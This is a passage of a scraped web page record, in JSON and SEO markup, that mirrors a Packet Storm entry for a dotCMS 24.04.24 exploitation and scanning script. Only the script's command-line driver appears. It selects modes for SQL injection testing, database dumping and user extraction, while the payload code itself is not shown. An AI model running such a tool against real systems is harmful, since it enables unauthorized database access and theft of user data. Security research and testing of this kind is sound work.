\u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\n Advanced Database Exploitation Framework\\n Authorized testing only!\\n \\”\\”\\”\\n \\n parser = argparse.ArgumentParser(\\n description=’DotCMS Advanced Database Exploitation Framework’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=”’\\n Examples:\\n %(prog)s -t https:\/\/target.com:8443 –database\\n %(prog)s –target http:\/\/localhost:8080 –full\\n \\n Modes:\\n –database : Perform database enumeration and dump only\\n –full : Complete exploitation including database\\n –quick : Quick scan without heavy operations\\n \\n Legal Notice:\\n This tool is for authorized penetration testing only.\\n Unauthorized use is illegal and unethical.\\n ”’\\n )\\n \\n parser.add_argument(‘-t’, ‘–target’, required=True,\\n help=’Target URL (e.g., https:\/\/target.com:8443)’)\\n parser.add_argument(‘–database’, action=’store_true’,\\n help=’Database enumeration and dump only’)\\n parser.add_argument(‘–full’, action=’store_true’,\\n help=’Complete exploitation (including database)’)\\n parser.add_argument(‘–quick’, action=’store_true’,\\n help=’Quick scan only’)\\n \\n args = parser.parse_args()\\n \\n print(f\\”{Fore.RED}{banner}{Style.RESET_ALL}\\”)\\n \\n # Confirm authorization\\n response = input(f\\”{Fore.YELLOW}[?] Do you have explicit permission to test {args.target}? (yes\/NO): {Style.RESET_ALL}\\”)\\n if response.lower() != ‘yes’:\\n print(f\\”{Fore.RED}[!] Operation cancelled. Unauthorized access is illegal.{Style.RESET_ALL}\\”)\\n sys.exit(1)\\n \\n # Run exploitation\\n try:\\n exploit = DotCMSExploiter(args.target)\\n \\n if args.database:\\n # Database-only mode\\n exploit.log(\\”[*] Running database exploitation only…\\”, ‘info’)\\n sqli_vulns = exploit.enhanced_sqli_testing()\\n if sqli_vulns:\\n exploit.run_database_exploitation(sqli_vulns[0].get(‘endpoint’))\\n else:\\n exploit.log(\\”[-] No SQL injection found for database exploitation\\”, ‘error’)\\n \\n elif args.full:\\n # Full exploitation including database\\n exploit.run_full_exploitation()\\n \\n elif args.quick:\\n # Quick mode\\n exploit.log(\\”[*] Running quick scan…\\”, ‘info’)\\n exploit.check_tls()\\n sqli_vulns = exploit.enhanced_sqli_testing()\\n if sqli_vulns:\\n exploit.extract_users_comprehensive(sqli_vulns[0].get(‘endpoint’))\\n exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], [])\\n \\n else:\\n # Interactive mode\\n print(f\\”\\\\n{Fore.CYAN}Select operation mode:{Style.RESET_ALL}\\”)\\n print(f\\”1. Full exploitation (including database)\\”)\\n print(f\\”2. Database enumeration only\\”)\\n print(f\\”3. Quick vulnerability scan\\”)\\n \\n choice = input(f\\”\\\\n{Fore.YELLOW}Select option (1-3): {Style.RESET_ALL}\\”)\\n \\n if choice == ‘1’:\\n exploit.run_full_exploitation()\\n elif choice == ‘2’:\\n sqli_vulns = exploit.enhanced_sqli_testing()\\n if sqli_vulns:\\n exploit.run_database_exploitation(sqli_vulns[0].get(‘endpoint’))\\n else:\\n exploit.log(\\”[-] No SQL injection found\\”, ‘error’)\\n elif choice == ‘3’:\\n exploit.check_tls()\\n sqli_vulns = exploit.enhanced_sqli_testing()\\n if sqli_vulns:\\n exploit.extract_users_comprehensive(sqli_vulns[0].get(‘endpoint’))\\n exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], [])\\n else:\\n exploit.log(\\”[*] Running full exploitation by default\\”, ‘info’)\\n exploit.run_full_exploitation()\\n \\n except KeyboardInterrupt:\\n print(f\\”\\\\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}\\”)\\n except Exception as e:\\n print(f\\”{Fore.RED}[!] Critical error: {str(e)}{Style.RESET_ALL}\\”)\\n import traceback\\n traceback.print_exc()\\n \\n if __name__ == ‘__main__’:\\n # Fix Windows asyncio event loop policy\\n if sys.platform == ‘win32’:\\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\\n \\n main()\\n \\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212770″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212770\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-12T17:15:30″,”description”:”dotCMS version 24.04.24 advanced exploitation python scanning script that looks for local file inclusion, data exposure, SQL injection, and more…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212770″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-30773","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30773\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-12T17:15:30″,”description”:”dotCMS version 24.04.24 advanced exploitation python scanning script that looks for local file inclusion, data exposure, SQL injection, and more…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212770″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30773\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-12T11:58:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"43 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770\",\"datePublished\":\"2025-12-12T11:58:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773\"},\"wordCount\":8453,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30773#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773\",\"name\":\"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-12T11:58:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30773\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30773#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30773","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem","og_description":"{“lastseen”:”2025-12-12T17:15:30″,”description”:”dotCMS version 24.04.24 advanced exploitation python scanning script that looks for local file inclusion, data exposure, SQL injection, and more…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212770″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================n |...","og_url":"https:\/\/zero.redgem.net\/?p=30773","og_site_name":"zero redgem","article_published_time":"2025-12-12T11:58:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"43 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30773#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30773"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770","datePublished":"2025-12-12T11:58:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30773"},"wordCount":8453,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30773#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30773","url":"https:\/\/zero.redgem.net\/?p=30773","name":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-12T11:58:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30773#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30773"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30773#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30773","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30773"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30773\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30773"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}